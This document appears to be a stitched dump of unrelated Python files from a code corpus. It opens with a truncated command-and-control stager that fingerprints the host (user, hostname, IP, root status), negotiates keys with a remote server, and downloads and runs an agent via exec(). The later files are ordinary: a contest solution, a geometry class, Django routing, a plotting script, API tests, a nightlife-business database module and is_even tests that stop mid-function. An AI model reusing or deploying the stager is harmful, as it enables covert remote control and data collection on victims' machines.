offset = 0
# ensure we have at least the 20 bytes for a routing packet
if len(data) >= 20:
while True:
if len(data) - offset < 20:
break
RC4IV = data[0+offset:4+offset]
RC4data = data[4+offset:20+offset]
routingPacket = rc4(RC4IV+stagingKey, RC4data)
sessionID = routingPacket[0:8]
# B == 1 byte unsigned char, H == 2 byte unsigned short, L == 4 byte unsigned long
(language, meta, additional, length) = struct.unpack("=BBHL", routingPacket[8:])
if length < 0:
encData = None
else:
encData = data[(20+offset):(20+offset+length)]
results[sessionID] = (LANGUAGE_IDS.get(language, 'NONE'), META_IDS.get(meta, 'NONE'), ADDITIONAL_IDS.get(additional, 'NONE'), encData)
# check if we're at the end of the packet processing
remainingData = data[20+offset+length:]
if not remainingData:
break
offset += 20 + length
return results
else:
print "[*] parse_agent_data() data length incorrect: %s" % (len(data))
return None
else:
print "[*] parse_agent_data() data is None"
return None
def build_routing_packet(stagingKey, sessionID, meta=0, additional=0, encData=''):
"""
Takes the specified parameters for an RC4 "routing packet" and builds/returns
an HMAC'ed RC4 "routing packet".
packet format:
Routing Packet:
+---------+-------------------+--------------------------+
| RC4 IV | RC4s(RoutingData) | AESc(client packet data) | ...
+---------+-------------------+--------------------------+
| 4 | 16 | RC4 length |
+---------+-------------------+--------------------------+
RC4s(RoutingData):
+-----------+------+------+-------+--------+
| SessionID | Lang | Meta | Extra | Length |
+-----------+------+------+-------+--------+
| 8 | 1 | 1 | 2 | 4 |
+-----------+------+------+-------+--------+
"""
# binary pack all of the passed config values as unsigned numbers
# B == 1 byte unsigned char, H == 2 byte unsigned short, L == 4 byte unsigned long
data = sessionID + struct.pack("=BBHL", 2, meta, additional, len(encData))
RC4IV = os.urandom(4)
key = RC4IV + stagingKey
rc4EncData = rc4(key, data)
packet = RC4IV + rc4EncData + encData
return packet
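# Layout sanity sketch: the header packed above is 8 bytes of sessionID plus
# struct.calcsize("=BBHL") == 8 bytes of fields, i.e. exactly the 16 RC4 bytes
# that parse_routing_packet() slices out of data[4+offset:20+offset].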
def post_message(uri, data):
global headers
return (urllib2.urlopen(urllib2.Request(uri, data, headers))).read()
def get_sysinfo(nonce='00000000'):
# nonce | listener | domainname | username | hostname | internal_ip | os_details | high_integrity | process_name | process_id | language | language_version
__FAILED_FUNCTION = '[FAILED QUERY]'
try:
username = pwd.getpwuid(os.getuid())[0]
except Exception as e:
username = __FAILED_FUNCTION
try:
uid = os.popen('id -u').read().strip()
except Exception as e:
uid = __FAILED_FUNCTION
try:
highIntegrity = "True" if (uid == "0") else False
except Exception as e:
highIntegrity = __FAILED_FUNCTION
try:
osDetails = os.uname()
except Exception as e:
osDetails = __FAILED_FUNCTION
try:
hostname = osDetails[1]
except Exception as e:
hostname = __FAILED_FUNCTION
try:
internalIP = socket.gethostbyname(socket.gethostname())
except Exception as e:
internalIP = __FAILED_FUNCTION
try:
osDetails = ",".join(osDetails)
except Exception as e:
osDetails = __FAILED_FUNCTION
try:
processID = os.getpid()
except Exception as e:
processID = __FAILED_FUNCTION
try:
temp = sys.version_info
pyVersion = "%s.%s" % (temp[0],temp[1])
except Exception as e:
pyVersion = __FAILED_FUNCTION
language = 'python'
cmd = 'ps %s' % (os.getpid())
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
out = ps.stdout.read()
parts = out.split("\n")
ps.stdout.close()
if len(parts) > 2:
processName = " ".join(parts[1].split()[4:])
else:
processName = 'python'
return "%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s" % (nonce, server, '', username, hostname, internalIP, osDetails, highIntegrity, processName, processID, language, pyVersion)
# generate a randomized sessionID
sessionID = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in xrange(8))
# server configuration information
stagingKey = "REPLACE_STAGING_KEY"
profile = 'REPLACE_PROFILE'
WorkingHours = 'SET_WORKINGHOURS'
KillDate = 'SET_KILLDATE'
parts = profile.split('|')
taskURIs = parts[0].split(',')
userAgent = parts[1]
headersRaw = parts[2:]
# global header dictionary
# sessionID is set by stager.py
# headers = {'User-Agent': userAgent, "Cookie": "SESSIONID=%s" % (sessionID)}
headers = {'User-Agent': userAgent}
# parse the headers into the global header dictionary
for headerRaw in headersRaw:
try:
headerKey, headerValue = headerRaw.split(":", 1)
if headerKey.lower() == "cookie":
# append to any existing Cookie value instead of raising a KeyError on the first one
headers['Cookie'] = "%s;%s" % (headers['Cookie'], headerValue) if 'Cookie' in headers else headerValue
else:
headers[headerKey] = headerValue
except:
pass
# stage 3 of negotiation -> client generates DH key, and POSTs HMAC(AESn(PUBc)) back to server
clientPub = DiffieHellman()
hmacData = aes_encrypt_then_hmac(stagingKey, str(clientPub.publicKey))
# RC4 routing packet:
# meta = STAGE1 (2)
routingPacket = build_routing_packet(stagingKey=stagingKey, sessionID=sessionID, meta=2, encData=hmacData)
try:
postURI = server + '/index.jsp'
# response = post_message(postURI, routingPacket+hmacData)
response = post_message(postURI, routingPacket)
except:
exit()
# decrypt the server's public key and the server nonce
packet = aes_decrypt_and_verify(stagingKey, response)
nonce = packet[0:16]
serverPub = int(packet[16:])
# calculate the shared secret
clientPub.genKey(serverPub)
key = clientPub.key
# step 5 -> client POSTs HMAC(AESs([nonce+1]|sysinfo))
postURI = server + '/index.php'
hmacData = aes_encrypt_then_hmac(clientPub.key, get_sysinfo(nonce=str(int(nonce)+1)))
# RC4 routing packet:
# sessionID = sessionID
# language = PYTHON (2)
# meta = STAGE2 (3)
# extra = 0
# length = len(encData)
routingPacket = build_routing_packet(stagingKey=stagingKey, sessionID=sessionID, meta=3, encData=hmacData)
response = post_message(postURI, routingPacket)
# step 6 -> server sends HMAC(AES)
agent = aes_decrypt_and_verify(key, response)
agent = agent.replace('REPLACE_WORKINGHOURS', WorkingHours)
agent = agent.replace('REPLACE_KILLDATE', KillDate)
exec(agent)
| 83.41217 | 3,081 | 0.734419 |
4f3a2e637fa03ce2fcf0b20bbd5e026391b03f8a | 379 | py | Python | src/codechef/start7/ceilsum/sol_0.py | kagemeka/competitive-programming | c70fe481bcd518f507b885fc9234691d8ce63171 | [
"MIT"
] | 1 | 2021-07-11T03:20:10.000Z | 2021-07-11T03:20:10.000Z | src/codechef/start7/ceilsum/sol_0.py | kagemeka/competitive-programming | c70fe481bcd518f507b885fc9234691d8ce63171 | [
"MIT"
] | 39 | 2021-07-10T05:21:09.000Z | 2021-12-15T06:10:12.000Z | src/codechef/start7/ceilsum/sol_0.py | kagemeka/competitive-programming | c70fe481bcd518f507b885fc9234691d8ce63171 | [
"MIT"
] | null | null | null | import typing
def ceil(
n: int,
d: int,
) -> int:
return (n + d - 1) // d
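# e.g. ceil(7, 2) == 4 and ceil(8, 2) == 4 (ceiling integer division)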
def solve(
a: int,
b: int,
) -> typing.NoReturn:
x = ceil(b - a, 2)
if a == b:
print(x)
return
y = ceil(b - a - 1, 2) + 1
print(max(x, y))
def main():
t = int(input())
for _ in range(t):
a, b = map(
int, input().split(),
)
solve(a, b)
main() | 9.973684 | 28 | 0.451187 |
5701297692829dd4e33592b4f4e5a5bbaea9f400 | 861 | py | Python | Base/bp2DPnt.py | BitastaB/autumn2021-base | 84cadacd35d21904b315fef133271cb2976e8416 | [
"MIT"
] | 2 | 2021-10-04T12:20:36.000Z | 2021-10-04T12:21:17.000Z | Base/bp2DPnt.py | BitastaB/autumn2021-base | 84cadacd35d21904b315fef133271cb2976e8416 | [
"MIT"
] | 1 | 2021-10-04T13:59:48.000Z | 2021-10-04T13:59:48.000Z | Base/bp2DPnt.py | BitastaB/autumn2021-base | 84cadacd35d21904b315fef133271cb2976e8416 | [
"MIT"
] | 7 | 2021-10-04T12:23:53.000Z | 2022-03-30T20:05:17.000Z |
import numpy as np
class Point:
def __init__(self, x, y):
self.coord = np.array([x, y], dtype=int)
def __repr__(self):
return '(%d, %d)' % (self.coord[0], self.coord[1])
def __eq__(self, other):
return self.coord[0] == other.coord[0] and self.coord[1] == other.coord[1]
def __ne__(self, other):
return not self.__eq__(other)
def __add__(self, other):
return Point(self.coord[0] + other.coord[0], self.coord[1] + other.coord[1])
def __hash__(self):
return hash((self.coord[0], self.coord[1]))
def copy(self):
return Point(self.coord[0], self.coord[1])
def get_coord(self):
return self.coord
def get_x(self):
return self.coord[0]
def get_y(self):
return self.coord[1]
if __name__ == '__main__':
pass
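# Usage sketch: Point(1, 2) + Point(3, 4) == Point(4, 6)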
| 17.9375 | 84 | 0.569106 |
d561abcc06b6b94405510686c4cd34c16720ad4e | 941 | py | Python | Hello/urls.py | singhpawank/Hello-MyWorld | 0dce27f01e396a38427b4d80a0b51213f9c46069 | [
"MIT"
] | null | null | null | Hello/urls.py | singhpawank/Hello-MyWorld | 0dce27f01e396a38427b4d80a0b51213f9c46069 | [
"MIT"
] | null | null | null | Hello/urls.py | singhpawank/Hello-MyWorld | 0dce27f01e396a38427b4d80a0b51213f9c46069 | [
"MIT"
] | null | null | null | """Hello URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
admin.site.site_header = "Hello! Admin"
admin.site.site_title = "Hello! Admin Portal"
admin.site.index_title = "Welcome to Hello! Researcher Portal"
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('home.urls'))
]
| 34.851852 | 77 | 0.712009 |
fcbae9d6b757a80e72098718156e2187e7683903 | 3,757 | py | Python | assets/img/computed_probabilities_vs_theoretic_probabilities/main.py | drvinceknight/testing_for_ZD | a08643849a8e4ed3c1ee86ab8bd4530a97e92154 | [
"MIT"
] | null | null | null | assets/img/computed_probabilities_vs_theoretic_probabilities/main.py | drvinceknight/testing_for_ZD | a08643849a8e4ed3c1ee86ab8bd4530a97e92154 | [
"MIT"
] | 3 | 2019-10-02T09:25:08.000Z | 2022-02-27T20:48:06.000Z | assets/img/computed_probabilities_vs_theoretic_probabilities/main.py | drvinceknight/testing_for_ZD | a08643849a8e4ed3c1ee86ab8bd4530a97e92154 | [
"MIT"
] | null | null | null | """
Plot the measured probabilities versus the theoretic ones
"""
import sys
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import statsmodels.api as sm
import tqdm
import imp
import testzd as zd
parameters = imp.load_source("parameters", "../../../data/raw/parameters.py")
def main(process_data):
if process_data:
rates = ["P(C|CC)", "P(C|CD)", "P(C|DC)", "P(C|DD)"]
probabilities = ["P(CC)", "P(CD)", "P(DC)", "P(DD)"]
df = pd.concat(
(
pd.read_csv(
"../../../data/processed/full/std/per_opponent/main.csv"
),
pd.read_csv(
"../../../data/processed/stewart_plotkin/std/per_opponent/main.csv"
),
)
)
player_pair_vectors = {}
player_pair_probabilities = {}
for _, row in tqdm.tqdm(df.iterrows(), total=df.shape[0]):
pair = tuple(row[["Player index", "Opponent index"]])
if pair[::-1] in player_pair_vectors:
player_pair_vectors[pair[::-1]].append(tuple(row[rates]))
else:
player_pair_vectors[pair] = [tuple(row[rates])]
player_pair_probabilities[pair] = tuple(row[probabilities])
data = []
player_pair_theoretic_probabilities = {}
for i, j in player_pair_probabilities:
try:
p, q = player_pair_vectors[i, j]
except ValueError:
p = player_pair_vectors[i, j][0]
q = p
try:
pi = zd.compute_pi(np.array(p), np.array(q))[:, 0]
except np.linalg.LinAlgError:
pi = [np.nan, np.nan, np.nan, np.nan]
data.append([i, j, *pi, *player_pair_probabilities[i, j]])
df = pd.DataFrame(
data,
columns=[
"Player index",
"Opponent index",
"theoretic P(CC)",
"theoretic P(CD)",
"theoretic P(DC)",
"theoretic P(DD)",
"P(CC)",
"P(CD)",
"P(DC)",
"P(DD)",
],
)
df.dropna(inplace=True)
df.to_csv("main.csv", index=False)
else:
df = pd.read_csv("main.csv")
fig, axarr = plt.subplots(nrows=2, ncols=2, sharex="col", sharey="row")
index = (
np.isfinite(df["P(CC)"])
& np.isfinite(df["P(CD)"])
& np.isfinite(df["P(DC)"])
& np.isfinite(df["P(DD)"])
& (df[f"theoretic P(CC)"] >= 0)
& (df[f"theoretic P(CC)"] <= 1)
& (df[f"theoretic P(CD)"] >= 0)
& (df[f"theoretic P(CD)"] <= 1)
& (df[f"theoretic P(DC)"] >= 0)
& (df[f"theoretic P(DC)"] <= 1)
& (df[f"theoretic P(DD)"] >= 0)
& (df[f"theoretic P(DD)"] <= 1)
)
for i, state in enumerate(("CC", "CD", "DC", "DD")):
ax = axarr[int(i / 2), i % 2]
prob = f"P({state})"
y = df[index][prob]
x = df[index][f"theoretic {prob}"]
ax.scatter(x, y, label=prob)
x_for_model = sm.add_constant(x)
model = sm.OLS(y, x_for_model)
results = model.fit()
b, a = results.params
ax.plot([0, 1], [b, a + b], color="black")
if i in [2, 3]:
ax.set_xlabel("Computed probabilities")
if i in [0, 2]:
ax.set_ylabel("Measured probabilities")
ax.set_title(
f"P({state}) ($N={int(results.nobs)},\;R^2={round(results.rsquared, 3)}$)"
)
fig.tight_layout()
fig.savefig("main.pdf")
if __name__ == "__main__":
process_data = "process_data" in sys.argv
main(process_data=process_data)
| 29.582677 | 87 | 0.48922 |
8c26dce072271b24952915da79c5e1bf762647c7 | 5,216 | py | Python | backend/mlarchive/tests/archive/api.py | dkg/mailarch | 562757c09e212c202c35231d7e7c588cd4d3fb65 | [
"BSD-3-Clause"
] | 6 | 2022-03-09T23:10:28.000Z | 2022-03-21T05:32:40.000Z | backend/mlarchive/tests/archive/api.py | dkg/mailarch | 562757c09e212c202c35231d7e7c588cd4d3fb65 | [
"BSD-3-Clause"
] | 5 | 2022-03-11T09:39:47.000Z | 2022-03-30T16:48:09.000Z | backend/mlarchive/tests/archive/api.py | dkg/mailarch | 562757c09e212c202c35231d7e7c588cd4d3fb65 | [
"BSD-3-Clause"
] | 4 | 2022-03-04T15:36:19.000Z | 2022-03-28T23:45:44.000Z | import datetime
import pytest
from django.urls import reverse
from factories import EmailListFactory, MessageFactory
@pytest.mark.django_db(transaction=True)
def test_msg_counts_one_list(client, messages):
url = reverse('api_msg_counts') + '?list=pubone&start=20130101'
response = client.get(url)
data = response.json()
assert 'pubone' in data['msg_counts']
assert data['msg_counts']['pubone'] == 5
@pytest.mark.django_db(transaction=True)
def test_msg_counts_two_lists(client, messages):
url = reverse('api_msg_counts') + '?list=pubone,pubtwo&start=20130101'
response = client.get(url)
data = response.json()
assert 'pubone' in data['msg_counts']
assert data['msg_counts']['pubone'] == 5
assert 'pubtwo' in data['msg_counts']
assert data['msg_counts']['pubtwo'] == 2
@pytest.mark.django_db(transaction=True)
def test_msg_counts_unknown_list(client, messages):
url = reverse('api_msg_counts') + '?list=balloons&start=20130101'
response = client.get(url)
data = response.json()
assert response.status_code == 404
assert data == {'error': 'list not found'}
@pytest.mark.django_db(transaction=True)
def test_msg_counts_private_list(client, messages):
url = reverse('api_msg_counts') + '?list=private&start=20130101'
response = client.get(url)
data = response.json()
assert response.status_code == 404
assert data == {'error': 'list not found'}
@pytest.mark.django_db(transaction=True)
def test_msg_counts_no_list(client, messages):
'''Should return all public lists, no private'''
url = reverse('api_msg_counts') + '?start=20130101'
response = client.get(url)
data = response.json()
assert 'pubone' in data['msg_counts']
assert data['msg_counts']['pubone'] == 5
assert 'pubtwo' in data['msg_counts']
assert data['msg_counts']['pubtwo'] == 2
assert 'private' not in data['msg_counts']
@pytest.mark.django_db(transaction=True)
def test_msg_counts_no_date(client, messages):
'''If no date provided return last month'''
pubfour = EmailListFactory.create(name='pubfour')
date = datetime.datetime.now().replace(second=0, microsecond=0)
MessageFactory.create(email_list=pubfour, date=date - datetime.timedelta(days=14))
MessageFactory.create(email_list=pubfour, date=date - datetime.timedelta(days=35))
url = reverse('api_msg_counts') + '?list=pubfour'
response = client.get(url)
data = response.json()
assert 'pubfour' in data['msg_counts']
assert data['msg_counts']['pubfour'] == 1
@pytest.mark.django_db(transaction=True)
def test_msg_counts_start(client, messages):
url = reverse('api_msg_counts') + '?list=pubone&start=20130601'
response = client.get(url)
data = response.json()
assert 'start' in data
assert data['start'] == '20130601'
assert 'pubone' in data['msg_counts']
assert data['msg_counts']['pubone'] == 2
@pytest.mark.django_db(transaction=True)
def test_msg_counts_start_bad(client, messages):
url = reverse('api_msg_counts') + '?list=pubone&start=142'
response = client.get(url)
data = response.json()
assert response.status_code == 400
assert data == {'error': 'invalid start date'}
@pytest.mark.django_db(transaction=True)
def test_msg_counts_end(client, messages):
url = reverse('api_msg_counts') + '?list=pubone&start=20130101&end=20130601'
response = client.get(url)
data = response.json()
assert 'end' in data
assert data['end'] == '20130601'
assert 'pubone' in data['msg_counts']
assert data['msg_counts']['pubone'] == 3
@pytest.mark.django_db(transaction=True)
def test_msg_counts_end_bad(client, messages):
url = reverse('api_msg_counts') + '?list=pubone&start=20200101&end=142'
response = client.get(url)
data = response.json()
assert response.status_code == 400
assert data == {'error': 'invalid end date'}
@pytest.mark.django_db(transaction=True)
def test_msg_counts_invalid_date(client, messages):
url = reverse('api_msg_counts') + '?list=pubone&end=invalid'
response = client.get(url)
data = response.json()
assert 'error' in data
@pytest.mark.django_db(transaction=True)
def test_msg_counts_duration_months(client, messages):
url = reverse('api_msg_counts') + '?list=pubone&start=20130101&duration=1months'
response = client.get(url)
data = response.json()
assert 'pubone' in data['msg_counts']
assert data['msg_counts']['pubone'] == 1
@pytest.mark.django_db(transaction=True)
def test_msg_counts_duration_years(client, messages):
url = reverse('api_msg_counts') + '?list=pubone&start=20130101&duration=1years'
response = client.get(url)
data = response.json()
assert 'pubone' in data['msg_counts']
assert data['msg_counts']['pubone'] == 3
@pytest.mark.django_db(transaction=True)
def test_msg_counts_duration_invalid(client, messages):
url = reverse('api_msg_counts') + '?list=pubone&start=20130101&duration=1eon'
response = client.get(url)
data = response.json()
assert response.status_code == 400
assert data == {'error': 'invalid duration'} | 35.972414 | 87 | 0.69536 |
77df64ac224bd353ad098167ec2418d1526e349a | 6,612 | py | Python | business.py | Javierd/NightLive-Server | 7323cda2a76ca1181d82fc9f76599d0492886721 | [
"MIT"
] | null | null | null | business.py | Javierd/NightLive-Server | 7323cda2a76ca1181d82fc9f76599d0492886721 | [
"MIT"
] | null | null | null | business.py | Javierd/NightLive-Server | 7323cda2a76ca1181d82fc9f76599d0492886721 | [
"MIT"
] | null | null | null | import time
import userDatabase as userDB
import locationsDatabase as locationsDB
import placesDatabase as placesDB
import utils
import bcrypt
import hashlib
ageLabels = ['-18', '18-22', '23-28', '29-35', '36-40', '41-50', '51-60', '61-70', '+70']
sexLabels = ['Man', 'Woman', 'Other']
ageBgColors = ['rgba(255, 167, 38, 1)',
'rgba(239, 83, 80, 1)',
'rgba(171, 71, 188, 1)',
'rgba(255, 193, 7, 1)',
'rgba(92, 107, 192, 1)',
'rgba(66, 165, 245, 1)',
'rgba(38, 198, 218, 1)',
'rgba(102, 187, 106, 1)',
'rgba(212, 225, 87, 1)']
sexBgColors = [ 'rgba(66, 165, 245, 1)',
'rgba(236, 64, 122, 1)',
'rgba(171, 71, 188, 1)']
ageBorderColors = ['rgba(0, 0, 0, 0.7)',
'rgba(0, 0, 0, 0.7)',
'rgba(255, 206, 86, 0.7)',
'rgba(75, 192, 192, 0.7)',
'rgba(153, 102, 255, 0.7)',
'rgba(5, 192, 192, 0.7)',
'rgba(75, 192, 12, 0.7)',
'rgba(75, 1, 192, 0.7)',
'rgba(255, 159, 64, 0.7)']
sexBorderColors = ['rgba(0, 0, 0, 0.7)',
'rgba(0, 0, 0, 0.7)',
'rgba(255, 206, 86, 0.7)']
def businessSignIn(conn, mail, password):
#0 = OK, 1 = Wrong user name, 2 = wrong password
c = conn.cursor()
c.execute("SELECT password, token, id FROM business WHERE mail = ?", (mail,))
dbPass = c.fetchone()
if(dbPass == None):
return 1
if not bcrypt.checkpw(password.encode('utf8'), dbPass[0]):
return 2
return 0
def businessSignUp(conn, place, password, mail):
#0 = OK, 1 = place already registered, 2 = email in use, 3 = Wrong email, 4 = other error
c = conn.cursor()
#Check if the place or email are already registered
c.execute("SELECT * FROM business WHERE placeId = ?", (place,))
if(len(c.fetchall()) != 0):
return 1
c.execute("SELECT id FROM business WHERE mail = ?", (mail,))
if(len(c.fetchall()) != 0):
return 2
hashedPass = bcrypt.hashpw(password.encode('utf8'), bcrypt.gensalt())
token = hashlib.sha256((str(place) + password).encode('utf8')).hexdigest()
t = (place, mail, hashedPass, str(token))
c.execute("INSERT INTO business(placeId, mail, password, token) VALUES (?, ?, ?, ?)", t)
conn.commit()
return 0
def authenticateBusiness(conn, placeId, token):
c = conn.cursor()
c.execute("SELECT token FROM business WHERE id = ?", (placeId,))
dbPass = c.fetchone()
if(dbPass == None):
return False
if(token != dbPass[0]):
return False
return True
#TODO change startTime and endTime wih the local opening and closing hours
def getBusinessUserData(conn, placeId, days):
#TODO
"""if(authenticateBusiness(conn, placeId, token) == False):
return 1"""
dateTS = utils.timeInMillis()
usersInfo = []
usersAge = [0, 0, 0, 0, 0, 0, 0, 0, 0]
usersSex = [0, 0, 0]
#TODO Allow multiple timestamps
startTimestamp = dateTS - days*24*3600*1000
location = placesDB.getPlaceLocation(conn, placeId)
if(location == None):
return "The place doesn't exists"
#Get all the users that were arround that location since the timestamp (24h)
#TODO Change the 100m number
lat = location[0]
lng = location[1]
radius = 100
# ~0.00001 degrees of latitude is about 1.1 m, so scale the bounding box by the radius in metres
maxLat = lat + 0.00001 * radius
minLat = lat - 0.00001 * radius
maxLng = lng + 0.00001 * radius
minLng = lng - 0.00001 * radius
t = (startTimestamp, dateTS, maxLat, minLat, maxLng, minLng)
c = conn.cursor()
c.execute("""SELECT sex, birthdate, styles FROM users
WHERE id IN (
SELECT user
FROM locations
WHERE timestamp >= ? AND timestamp <= ?
AND latitude <= ? AND latitude >= ? AND longitude <= ? AND longitude >= ?
GROUP BY user)""", t)
#From each user, get the age and sort from -18, 18-22, 23-28- 29-35- 36-40, 41-50, 51-60, 61-70, +70
for user in c.fetchall():
age = int((dateTS - user[1]) / (1000 * 3600 * 24 * 365))
#Sex
if user[0] == 0:
usersSex[0] +=1
elif user[0] == 1:
usersSex[1] +=1
elif user[0] == 2:
usersSex[2] +=1
#Ages
if age > 70:
usersAge[8] += 1
elif age > 60:
usersAge[7] += 1
elif age > 50:
usersAge[6] += 1
elif age > 40:
usersAge[5] += 1
elif age > 35:
usersAge[4] += 1
elif age >= 29:  # >= so the 29-35, 23-28 and 18-22 buckets include their lower bounds, matching ageLabels
usersAge[3] += 1
elif age >= 23:
usersAge[2] += 1
elif age >= 18:
usersAge[1] += 1
else:
usersAge[0] += 1
usersInfo.append(usersSex)
usersInfo.append(usersAge)
return usersInfo
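# Returned shape: [usersSex, usersAge]; usersSex aligns with sexLabels
# ('Man', 'Woman', 'Other') and usersAge with the nine ageLabels buckets
# defined at the top of this module.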
def getBusinessInflowData(conn, placeId, days):
#TODO
"""if(authenticateBusiness(conn, placeId, token) == False):
return 1"""
nowTimestamp = utils.dayInMillis()
inflowDataValues = []
inflowDataLabels = []
location = placesDB.getPlaceLocation(conn, placeId)
if(location == None):
return "The place doesn't exists"
#Get the number of users that were arround that location between the two timestamps
#TODO Change the 100m number
for i in reversed(range(0, days+1)):
startTimestamp = nowTimestamp - (i+1)*24*3600*1000
endTimestamp = nowTimestamp - i*24*3600*1000
numUsers = locationsDB.getNumUsersArround(conn, location[0], location[1], 100, startTimestamp, endTimestamp)
dateStr = utils.millisToDate(startTimestamp, "%m/%d/%Y")
inflowDataValues.append(numUsers)
inflowDataLabels.append(dateStr)
return [inflowDataLabels, inflowDataValues]
def businessPostFlyer(conn, name, placeId, token, price, currency, imageUrl, color, qrCode, info, startTimestamp, endTimestamp):
    #TODO Remove 'token!=None'; it is only for testing without having to pass the token
if(token!=None and authenticateBusiness(conn, placeId, token) == False):
return 1
c = conn.cursor()
t=(name, placeId, price, currency, imageUrl, color, qrCode, info, startTimestamp, endTimestamp)
print(t)
    #Normalise the price to a real number (REPLACE swaps a decimal comma for a point)
c.execute("""INSERT INTO flyers(name, placeId, price, currency, image, color, qr, info, startTimestamp, endTimestamp)
VALUES (?, ?, REPLACE(?, ',', '.'), ?, ?, ?, ?, ?, ?, ?)""", t)
conn.commit()
return 0
#TODO This is for the users, so we need to add user authentication, not business authentication
#TODO Check if the place exists (maybe; anyway, it won't return an error)
def businessGetUsersFlyers(conn, placeId):
flyers = []
c = conn.cursor()
timestamp = utils.timeInMillis()
c.execute("""SELECT name, price, currency, image, color, qr, info, startTimestamp, endTimestamp FROM flyers WHERE placeId = ? AND
startTimestamp <= ? AND endTimestamp >= ? """, (placeId, timestamp, timestamp))
for i in c.fetchall():
flyer = utils.setUpFlyer(i[0], i[1], i[2], utils.SERVER_URL + i[3], i[4], i[5], i[6], i[7], i[8])
flyers.append(flyer)
return flyers | 29.783784 | 130 | 0.624168 |
5b4534dc86dac131d7395d47ea8825b4b4e2657a | 3,296 | py | Python | hibiapi/app/middlewares.py | wukibaka/HibiAPI | 60f40b071d16d901215a0e3d7dd84f888e8064bb | [
"Apache-2.0"
] | null | null | null | hibiapi/app/middlewares.py | wukibaka/HibiAPI | 60f40b071d16d901215a0e3d7dd84f888e8064bb | [
"Apache-2.0"
] | null | null | null | hibiapi/app/middlewares.py | wukibaka/HibiAPI | 60f40b071d16d901215a0e3d7dd84f888e8064bb | [
"Apache-2.0"
] | null | null | null | from datetime import datetime
from typing import Awaitable, Callable, List
from fastapi import Request, Response
from fastapi.middleware.cors import CORSMiddleware
from fastapi.middleware.gzip import GZipMiddleware
from fastapi.middleware.trustedhost import TrustedHostMiddleware
from sentry_sdk.integrations.asgi import SentryAsgiMiddleware
from sentry_sdk.integrations.httpx import HttpxIntegration
from starlette.datastructures import MutableHeaders
from hibiapi.utils.config import Config
from hibiapi.utils.exceptions import BaseServerException, UncaughtException
from hibiapi.utils.log import LoguruHandler, logger
from hibiapi.utils.routing import request_headers, response_headers
from .application import app
from .handlers import exception_handler
RequestHandler = Callable[[Request], Awaitable[Response]]
if Config["server"]["gzip"].as_bool():
app.add_middleware(GZipMiddleware)
app.add_middleware(
CORSMiddleware,
allow_origins=Config["server"]["cors"]["origins"].get(List[str]),
allow_credentials=Config["server"]["cors"]["credentials"].as_bool(),
allow_methods=Config["server"]["cors"]["methods"].get(List[str]),
allow_headers=Config["server"]["cors"]["headers"].get(List[str]),
)
app.add_middleware(
TrustedHostMiddleware,
allowed_hosts=Config["server"]["allowed"].get(List[str]),
)
app.add_middleware(SentryAsgiMiddleware)
HttpxIntegration.setup_once()
@app.middleware("http")
async def request_logger(request: Request, call_next: RequestHandler) -> Response:
start_time = datetime.now()
host, port = request.client
response = await call_next(request)
process_time = (datetime.now() - start_time).total_seconds() * 1000
response_headers.get().setdefault("X-Process-Time", f"{process_time:.3f}")
bg, fg = (
("green", "red")
if response.status_code < 400
else ("yellow", "blue")
if response.status_code < 500
else ("red", "green")
)
status_code, method = response.status_code, request.method.upper()
user_agent = (
LoguruHandler.escape_tag(request.headers["user-agent"])
if "user-agent" in request.headers
else "<d>Unknown</d>"
)
logger.info(
f"<m><b>{host}</b>:{port}</m>"
f" | <{bg.upper()}><b><{fg}>{method}</{fg}></b></{bg.upper()}>"
f" | <n><b>{str(request.url)!r}</b></n>"
f" | <c>{process_time:.3f}ms</c>"
f" | <e>{user_agent}</e>"
f" | <b><{bg}>{status_code}</{bg}></b>"
)
return response
@app.middleware("http")
async def contextvar_setter(request: Request, call_next: RequestHandler):
request_headers.set(request.headers)
response_headers.set(MutableHeaders())
response = await call_next(request)
response.headers.update({**response_headers.get()})
return response
@app.middleware("http")
async def uncaught_exception_handler(
request: Request, call_next: RequestHandler
) -> Response:
try:
response = await call_next(request)
except Exception as error:
response = await exception_handler(
request,
exc=(
error
if isinstance(error, BaseServerException)
else UncaughtException.with_exception(error)
),
)
return response
| 33.979381 | 82 | 0.68932 |
b2ea4a6411607eb4f804dc76108aec6d314f8243 | 1,490 | py | Python | test_is_even.py | rosineygp/PyIsEven | 17b78128e42a8bf8b212cb582f376f9acf641dd1 | [
"MIT"
] | 45 | 2021-04-02T22:19:49.000Z | 2022-02-01T15:38:33.000Z | test_is_even.py | rosineygp/PyIsEven | 17b78128e42a8bf8b212cb582f376f9acf641dd1 | [
"MIT"
] | 20 | 2021-04-03T10:06:51.000Z | 2021-08-20T22:46:23.000Z | test_is_even.py | rosineygp/PyIsEven | 17b78128e42a8bf8b212cb582f376f9acf641dd1 | [
"MIT"
] | 11 | 2021-04-02T17:25:46.000Z | 2021-12-14T03:28:30.000Z | import unittest
from sys import version_info
from is_even import is_even
class TestIsEven(unittest.TestCase):
def test_even(self):
even = is_even.is_even(2)
self.assertTrue(even)
def test_odd(self):
odd = is_even.is_odd(3)
self.assertTrue(odd)
def test_not_even(self):
even = is_even.is_even(3)
self.assertFalse(even)
def test_not_odd(self):
even = is_even.is_odd(2)
self.assertFalse(even)
def test_cache(self):
self.assertTrue(is_even.is_even(2))
self.assertFalse(is_even.is_even(3))
def test_negative(self):
with self.assertRaises(Exception):
is_even.is_even(-10)
def test_failback_even(self):
v = 2
if version_info >= (3, 0):
even = list(is_even._is_even(v))[-1]
else:
even = is_even._is_even(v)
self.assertTrue(even)
def test_failback_odd(self):
v = 3
if version_info >= (3, 0):
odd = list(is_even._is_even(v))[-1]
else:
odd = is_even._is_even(v)
self.assertFalse(odd)
def test_ad(self):
if version_info >= (3, 0):
v = is_even.is_even(0)
self.assertTrue(isinstance(v.ad, str))
def test_ad_cached(self):
v = is_even.is_even(0)
y = is_even.is_even(0)
if version_info >= (3, 0):
